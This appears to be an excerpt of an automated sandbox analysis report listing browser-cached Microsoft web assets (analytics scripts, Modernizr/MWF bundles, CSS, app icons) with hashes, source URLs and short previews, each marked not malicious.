                                                                                                                                                                                                              Preview: .PNG........IHDR...@...@......iq....CiCCPICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O......:..L..$R...J5e?
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\ms.analytics-web-3.0.2.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):141843
                                                                                                                                                                                                              Entropy (8bit):5.39109012745785
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:EqMex/R5wi3A8sTQPTcXjA14DHABzlIQWYiFOuZlJOTPKlhaw:hJqQWYizZl4Tmhb
                                                                                                                                                                                                              MD5:F90EDA40BE6C962FA251F2BEDB3B40E5
                                                                                                                                                                                                              SHA1:92494B9488B489CC933A3D59CF26609645DA73AB
                                                                                                                                                                                                              SHA-256:25C56DB1E5ECCA40B1639E8C56067A881E8DCC41AB439335EA8B00247A74E881
                                                                                                                                                                                                              SHA-512:3A21B72773B4DE3B879C36F473E37A46EBFD30F7B2E27DB0E5E1AEA2AB06C9E97A1F99D152E96C08357B176988A2E93D2A309B3D6EE6A7F86D1FBA72BA621555
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://js.monitor.azure.com/scripts/c/ms.analytics-web-3.0.2.min.js
                                                                                                                                                                                                              Preview: /*!. * 1DS JS SDK Analytics Web, 3.0.2. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.var e=this,t=function(n){"use strict";var i="function",r="object",t="undefined",a="prototype",o="hasOwnProperty";function e(){return typeof globalThis!==t&&globalThis?globalThis:typeof self!==t&&self?self:typeof window!==t&&window?window:typeof global!==t&&global?global:null}function s(e){var t=Object.create;if(t)return t(e);if(null==e)return{};if((t=typeof e)!==r&&t!==i)throw new TypeError("Object prototype may only be an Object:"+e);function n(){}return n[a]=e,new n}var c=function(e,t){return(c=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var n in t)t[o](n)&&(e[n]=t[n])})(e,t)};zt=function(e,t){function n(){this.constructor=e}c(e,t),e[a]=null===t?s(t):(n[a]=t[a],new n)},(bn=Ht=e()||{}).__assign||(bn.__assign=Object.assign||function(e){for(var t,n=1,i=arguments.length;n<i;n++)for(var r in t=a
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\ms.analytics-web-3.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):133777
                                                                                                                                                                                                              Entropy (8bit):5.401139543860741
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:KanJYMz4u/HXPMxPtLXZDHQVA/NavWYiyi4AZtF3yTv0ZTssPrumj:Kan+k/vWYifDZt9yTv6PrF
                                                                                                                                                                                                              MD5:4BFA07382E218BC472FD01BC3B1C65FA
                                                                                                                                                                                                              SHA1:A87DB5AA1BD33AF439EC8A9A2373DFCBDA4877CF
                                                                                                                                                                                                              SHA-256:63BB71D9B6425F41BFD47231555D83A95507FC5EC3B9AC3E35A0EE8B0B906739
                                                                                                                                                                                                              SHA-512:92A0D67CBBA5DA2FE844FCADFE57E6AFB4C64CA019DBD8043AA9318FE6E3F17FC1B6F28F609FFB2EFB1AB22860C40217F125184D0C2919464CE9A4D274B2D99D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://az416426.vo.msecnd.net/scripts/c/ms.analytics-web-3.min.js
                                                                                                                                                                                                              Preview: /*!. * 1DS JS SDK Analytics Web, 3.1.2. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.var e=this,t=function(n){"use strict";var o="function",N="object",z="undefined",f="prototype",a="hasOwnProperty",i=Object,s=i[f],t=i.assign,r=i.create,e=i.defineProperty,c=s[a];function l(){return typeof globalThis!==z&&globalThis?globalThis:typeof self!==z&&self?self:typeof window!==z&&window?window:typeof global!==z&&global?global:null}function u(e){throw new TypeError(e)}function p(e){if(r)return r(e);if(null==e)return{};var t=typeof e;function n(){}return t!==N&&t!==o&&u("Object prototype may only be an Object:"+e),n[f]=e,new n}(l()||{}).Symbol,(l()||{}).Reflect;var d=t||function(e){for(var t,n=1,i=arguments.length;n<i;n++)for(var r in t=arguments[n])s[a].call(t,r)&&(e[r]=t[r]);return e},g=function(e,t){return(g=i.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var n in t)t[a](n)&&(e[n]=t[n])})(e,t)
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\mwf-auto-init-main.var.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):373553
                                                                                                                                                                                                              Entropy (8bit):5.173529631049082
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:X66qy74FC9UPy3rLg/99dQwWFroVSz98/CiDlmusUCEpuOxRxAu:X66qy6C9h78/9n1WF8M2/4UnRR
                                                                                                                                                                                                              MD5:AAD5210A5BCA8A2D9306714C43800D9D
                                                                                                                                                                                                              SHA1:B5760F90DB759ADB42DDCA934847E331ABA46C5F
                                                                                                                                                                                                              SHA-256:861B0D91CD1916B1542DEE1C6D0D370620178F25816FA461646B77963366BDBF
                                                                                                                                                                                                              SHA-512:7F48E88F4DFDDA4D36B5068FA77A065E848F59BD61880CE968D561AA5206327AB027733B4B544358E303EF5E09E7A75F94A5AFA3DAC0082CD627145ABC537F8A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://mwf-service.akamaized.net/mwf/js/bundle/1.58.0/mwf-auto-init-main.var.min.js
                                                                                                                                                                                                              Preview: /*! modernizr 3.3.1 (Custom Build) | MIT *. * https://modernizr.com/download/?-eventlistener-picture-printshiv-setclasses !*/.!function(n,t){function h(n,t){return typeof n===t}function c(){var u,n,f,e,o,c,t;for(var l in r)if(r.hasOwnProperty(l)){if(u=[],n=r[l],n.name&&(u.push(n.name.toLowerCase()),n.options&&n.options.aliases&&n.options.aliases.length))for(f=0;f<n.options.aliases.length;f++)u.push(n.options.aliases[f].toLowerCase());for(e=h(n.fn,"function")?n.fn():n.fn,o=0;o<u.length;o++)c=u[o],t=c.split("."),1===t.length?i[t[0]]=e:(!i[t[0]]||i[t[0]]instanceof Boolean||(i[t[0]]=new Boolean(i[t[0]])),i[t[0]][t[1]]=e),s.push((e?"":"no-")+t.join("-"))}}function l(n){var t=u.className,r=i._config.classPrefix||"",e;(f&&(t=t.baseVal),i._config.enableJSClass)&&(e=new RegExp("(^|\\s)"+r+"no-js(\\s|$)"),t=t.replace(e,"$1"+r+"js$2"));i._config.enableClasses&&(t+=" "+r+n.join(" "+r),f?u.className.baseVal=t:u.className=t)}var s=[],r=[],o={_version:"3.3.1",_config:{classPrefix:"",enableClasses:!0,
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\mwf-auto-init-main.var.min[2].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):307257
                                                                                                                                                                                                              Entropy (8bit):5.169381678188456
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:09GZepVIQHj9bOFGBiXZcwW9L4szVbkps2M3gV4L:09GNW9BBkW9oiFL
                                                                                                                                                                                                              MD5:BFCD48223E39F7A846413DD5814365E9
                                                                                                                                                                                                              SHA1:13DDB26618D203607C9B12D0D0D80F03ECB71362
                                                                                                                                                                                                              SHA-256:5E484A06AE85C5A599A6511224405A773FB3AF3D9D6600AF8F5A1B4A2C39504F
                                                                                                                                                                                                              SHA-512:FD66AA707E23432C48C5709CD75C2235850884F198B339EEA8238395A0B875ED7890AA2A04DFDF82E46C152CA7ECE88EA2B4C64C978C94BF84E274BF47A049B7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.22.1/scripts/mwf-auto-init-main.var.min.js
                                                                                                                                                                                                              Preview: /*! modernizr 3.3.1 (Custom Build) | MIT *. * https://modernizr.com/download/?-eventlistener-picture-printshiv-setclasses !*/.!function(e,t,n){function r(e,t){return typeof e===t}function a(){var e,t,n,a,o,c,l;for(var u in s)if(s.hasOwnProperty(u)){if(e=[],t=s[u],t.name&&(e.push(t.name.toLowerCase()),t.options&&t.options.aliases&&t.options.aliases.length))for(n=0;n<t.options.aliases.length;n++)e.push(t.options.aliases[n].toLowerCase());for(a=r(t.fn,"function")?t.fn():t.fn,o=0;o<e.length;o++)c=e[o],l=c.split("."),1===l.length?Modernizr[l[0]]=a:(!Modernizr[l[0]]||Modernizr[l[0]]instanceof Boolean||(Modernizr[l[0]]=new Boolean(Modernizr[l[0]])),Modernizr[l[0]][l[1]]=a),i.push((a?"":"no-")+l.join("-"))}}function o(e){var t=l.className,n=Modernizr._config.classPrefix||"";if(u&&(t=t.baseVal),Modernizr._config.enableJSClass){var r=new RegExp("(^|\\s)"+n+"no-js(\\s|$)");t=t.replace(r,"$1"+n+"js$2")}Modernizr._config.enableClasses&&(t+=" "+n+e.join(" "+n),u?l.className.baseVal=t:l.className=t)}
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\mwf-auto-init-main.var.min[3].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):298040
                                                                                                                                                                                                              Entropy (8bit):5.170582206405612
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:09GZg9tIQHj9b1skD1nPwwwW9/xNS/xg4DJ3P26:09GrW9/DCW9Yhu6
                                                                                                                                                                                                              MD5:9CA3E3920A1FB6F3A5D3FA1F40DA56F0
                                                                                                                                                                                                              SHA1:F4AC5E5BA4422919F4CC9A8499D672754F840CE4
                                                                                                                                                                                                              SHA-256:A5E5538AB72F6C15A94665A0828BECCE000BD96113DD7CBF877FB169CCE809AA
                                                                                                                                                                                                              SHA-512:D1979F0C625F9293D4E27608AC74566F71EF41995FF76E021C037726D93A45488F7A0F8F4353ADA9E39C058B77C65294BCAF7245B2EA20914E700AA773290649
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.23.1/scripts/mwf-auto-init-main.var.min.js
                                                                                                                                                                                                              Preview: /*! modernizr 3.3.1 (Custom Build) | MIT *. * https://modernizr.com/download/?-eventlistener-picture-printshiv-setclasses !*/.!function(e,t,n){function r(e,t){return typeof e===t}function a(){var e,t,n,a,o,c,l;for(var u in s)if(s.hasOwnProperty(u)){if(e=[],t=s[u],t.name&&(e.push(t.name.toLowerCase()),t.options&&t.options.aliases&&t.options.aliases.length))for(n=0;n<t.options.aliases.length;n++)e.push(t.options.aliases[n].toLowerCase());for(a=r(t.fn,"function")?t.fn():t.fn,o=0;o<e.length;o++)c=e[o],l=c.split("."),1===l.length?Modernizr[l[0]]=a:(!Modernizr[l[0]]||Modernizr[l[0]]instanceof Boolean||(Modernizr[l[0]]=new Boolean(Modernizr[l[0]])),Modernizr[l[0]][l[1]]=a),i.push((a?"":"no-")+l.join("-"))}}function o(e){var t=l.className,n=Modernizr._config.classPrefix||"";if(u&&(t=t.baseVal),Modernizr._config.enableJSClass){var r=new RegExp("(^|\\s)"+n+"no-js(\\s|$)");t=t.replace(r,"$1"+n+"js$2")}Modernizr._config.enableClasses&&(t+=" "+n+e.join(" "+n),u?l.className.baseVal=t:l.className=t)}
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\mwf-auto-init-main.var.min[4].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):373791
                                                                                                                                                                                                              Entropy (8bit):5.173276706942834
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:X66qy74FC9UPy3rLg/99dQwWFroVSz+8/CiDlmusUCFpuOxRxAu:X66qy6C9h78/9n1WF8Mt/4UcRR
                                                                                                                                                                                                              MD5:C4B26A3F6F1949F073F524A6C0F5FEC8
                                                                                                                                                                                                              SHA1:D4BE1A5101BD781492D6032BF26185AAEE35EF11
                                                                                                                                                                                                              SHA-256:AC18E8FFE7F183EA34D9C97F4E55A633F589FC340AD1C9023DE22BE76E1766DB
                                                                                                                                                                                                              SHA-512:203C62EAC523870F88F3FA2D4FA9E14EC0ABFC7A77D2581744189B04894578ACB82F9A75AB74440AFE21DFA97EC4F7F03F8CEF26B55ADBC984E6D6CC2B887E37
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://mwf-service.akamaized.net/mwf/js/bundle/1.57.8/mwf-auto-init-main.var.min.js
                                                                                                                                                                                                              Preview: /*! modernizr 3.3.1 (Custom Build) | MIT *. * https://modernizr.com/download/?-eventlistener-picture-printshiv-setclasses !*/.!function(n,t){function h(n,t){return typeof n===t}function c(){var u,n,f,e,o,c,t;for(var l in r)if(r.hasOwnProperty(l)){if(u=[],n=r[l],n.name&&(u.push(n.name.toLowerCase()),n.options&&n.options.aliases&&n.options.aliases.length))for(f=0;f<n.options.aliases.length;f++)u.push(n.options.aliases[f].toLowerCase());for(e=h(n.fn,"function")?n.fn():n.fn,o=0;o<u.length;o++)c=u[o],t=c.split("."),1===t.length?i[t[0]]=e:(!i[t[0]]||i[t[0]]instanceof Boolean||(i[t[0]]=new Boolean(i[t[0]])),i[t[0]][t[1]]=e),s.push((e?"":"no-")+t.join("-"))}}function l(n){var t=u.className,r=i._config.classPrefix||"",e;(f&&(t=t.baseVal),i._config.enableJSClass)&&(e=new RegExp("(^|\\s)"+r+"no-js(\\s|$)"),t=t.replace(e,"$1"+r+"js$2"));i._config.enableClasses&&(t+=" "+r+n.join(" "+r),f?u.className.baseVal=t:u.className=t)}var s=[],r=[],o={_version:"3.3.1",_config:{classPrefix:"",enableClasses:!0,
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\mwf-main.min[1].css
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):837184
                                                                                                                                                                                                              Entropy (8bit):5.102602917870846
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6144:8EZAGpZ9dyG1lBNZFbZ95+KpZ93+KmzvpRdU6mM+SMGquOa2+KT3zt/zXtRNtRQ8:8EZ9giisyNil2e
                                                                                                                                                                                                              MD5:E2C1827EC952E3C73EB57DB79A35CE46
                                                                                                                                                                                                              SHA1:668AFFC29B3B21EB46381453C8A409DD9069EA70
                                                                                                                                                                                                              SHA-256:2824162F40E1DF6E976288FFB5C9F8B415105E2209D63D6811D31DF6B71D5224
                                                                                                                                                                                                              SHA-512:860449CDA37C0ECAF5EB165362668CE104837D938DCF2F46C295B3EA56E6CA4BF4E5DBE50EB2C06464367C3D71123B76CDC8B37CC2AFD9D8FB6C883FBC6E7A6C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://mwf-service.akamaized.net/mwf/css/bundle/1.57.8/west-european/green/mwf-main.min.css
                                                                                                                                                                                                              Preview: @charset "UTF-8";./*! 1.57.8 | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.html{font-family:sa
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\mwf-main.var[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):975923
                                                                                                                                                                                                              Entropy (8bit):4.534114714730074
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12288:Mf6A3YtFg2jgDgUQZ+MLFPXTrK7Zy8viqtX5lXj5PsG4UJf0I/ltcpKR3+MMrOfF:MSVI/BvVclQPH
                                                                                                                                                                                                              MD5:0757357BA2567A518EAF8EB0723677E1
                                                                                                                                                                                                              SHA1:CC3EB31A04544F1A7257A0810FA09576E56035CB
                                                                                                                                                                                                              SHA-256:ED8A2123175AE5DBEC6A22DA8B479DACDA8F255FC21274A40ABFA7E7B6EB5676
                                                                                                                                                                                                              SHA-512:2168E1938C3E8A9FB006DF32805EACB541CD947DE7C97338D574E51440591D3D75537AFCB8BEC02CE32E51B719A4853C41C2770C0C5FF259CC668C87E60B1063
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.19.1/scripts/mwf-main.var.js
                                                                                                                                                                                                              Preview: var mwf =./******/ (function(modules) { // webpackBootstrap./******/ .// The module cache./******/ .var installedModules = {};./******/./******/ .// The require function./******/ .function __webpack_require__(moduleId) {./******/./******/ ..// Check if module is in cache./******/ ..if(installedModules[moduleId])./******/ ...return installedModules[moduleId].exports;./******/./******/ ..// Create a new module (and put it into the cache)./******/ ..var module = installedModules[moduleId] = {./******/ ...exports: {},./******/ ...id: moduleId,./******/ ...loaded: false./******/ ..};./******/./******/ ..// Execute the module function./******/ ..modules[moduleId].call(module.exports, module, module.exports, __webpack_require__);./******/./******/ ..// Flag the module as loaded./******/ ..module.loaded = true;./******/./******/ ..// Return the exports of the module./******/ ..return module.exports;./******/ .}./******/./******/./******/ .// expose the modules object (__webpack_modules__)./***
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\office.64x64x32[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):7454
                                                                                                                                                                                                              Entropy (8bit):7.9091028128348615
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:3llcHitlIxv9vk7C1+I4wWHLihk/x6YzadZtRUzSQ2/C3agvMf38LcKQyT61F7Jh:8IIHUCD4waJBzY/oMf6m8SX
                                                                                                                                                                                                              MD5:DB5BB2BA86E5ACB63AB21261717317F3
                                                                                                                                                                                                              SHA1:9887E86F015155141F83735306292AD3B0B40734
                                                                                                                                                                                                              SHA-256:97661489AA70DD4D01783D05AD1D9A799326B9D5E77059B3BBDF58161AE23C54
                                                                                                                                                                                                              SHA-512:C4AED571FCC0062D12E710FA2119DE636E6C8B486BE93929B6C8062BF9181A3E9286D0147643E97F32E93F4DF6D6F2177BBBDEF345690F9DA2A45CD0C4C0EF5D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://support.microsoft.com/socimages/appicons/office.64x64x32.png
                                                                                                                                                                                                              Preview: .PNG........IHDR...@...@......iq....CiCCPICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O......:..L..$R...J5e?
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\onedrive.64x64x32[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):5578
                                                                                                                                                                                                              Entropy (8bit):7.861316061821983
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:3llcHitlIxv9vk7C1+I4wWHLihk/x6Yzg8NthFlCn5lCH22ADtXqEcgeiR:8IIHUCD4waJJkDaEleiR
                                                                                                                                                                                                              MD5:403C85D53B4A05B73CB9A521276EFB30
                                                                                                                                                                                                              SHA1:7F108658D91E9C22F64AB2480669C27333AE4C7C
                                                                                                                                                                                                              SHA-256:9509144D70B7117D3E4E0BDE7FE33AC714DBE391BB71BAE8DB0009FD2A2447DD
                                                                                                                                                                                                              SHA-512:A0CF358C23528AAF9A7B13A9B9FFD969904E15D3B431673153BAF656D05088D8DC85262CDD6EC40E2E6C0758FA8FE65AA74101B04F621075040DCF6C3E903498
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://support.microsoft.com/socimages/appicons/onedrive.64x64x32.png
                                                                                                                                                                                                              Preview: .PNG........IHDR...@...@......iq....CiCCPICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O......:..L..$R...J5e?
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\outlook.64x64x32[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):6896
                                                                                                                                                                                                              Entropy (8bit):7.905002740620606
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:3llcHitlIxv9vk7C1+I4wWHLihk/x6YzPJIdtRy/2vD6DQWjArryp3QkoNsPOebm:8IIHUCD4waJAXvMVjArIQT1e2KszSW
                                                                                                                                                                                                              MD5:51B9B3DB9155ECD54A97E798B3A51860
                                                                                                                                                                                                              SHA1:0F72201FFA073DD1E829C2CBD67D37C78AB8ECCA
                                                                                                                                                                                                              SHA-256:E7C56CB393C76CAF1A7826502551C998933B5C5EBC8332DD329F177B031183D2
                                                                                                                                                                                                              SHA-512:C3B8864595A96B389539DE2105D91576C4CAA0F3AC6C734F7B67157AACF3C51389507355A9B012AE69581B972A8D21FC9A39990FB7CF611F178FDBD82CAD91B2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://support.microsoft.com/socimages/appicons/outlook.64x64x32.png
                                                                                                                                                                                                              Preview: .PNG........IHDR...@...@......iq....CiCCPICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O......:..L..$R...J5e?
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\script[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1822358
                                                                                                                                                                                                              Entropy (8bit):5.79324363999698
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:49152:dGzwWwtErl7HXLdJI2n7dc4SILggk9i7VnWRkzS6VmnS30i6B9auHRR8/e+9F5SZ:7vB+Ny
                                                                                                                                                                                                              MD5:39D7503C73C4B9E99C6E0572C5964007
                                                                                                                                                                                                              SHA1:7B95C9ECA6F03B75E59B9916E6012E1912F67EA1
                                                                                                                                                                                                              SHA-256:203CDE7D6A106751583536731FD3678412925FCAB46593D9AB3B8C541627CB00
                                                                                                                                                                                                              SHA-512:FEF256E3EB9DF544BE939E1868C2CF08648841A95642C3ACEB2B9BE1F236B524FFF052CE440B54E498DD679EE75DB47EE9B06B326A7635BA8FE80EB8727DA201
                                                                                                                                                                                                              Malicious:false
